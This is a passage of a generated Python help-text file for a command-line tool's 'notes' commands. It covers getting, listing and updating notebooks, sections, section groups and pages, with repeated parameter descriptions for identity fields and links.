--created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for users" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for users" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from users" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from users" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from users" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in users" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for users" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for users" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from users" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from users" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in users" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in users" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a 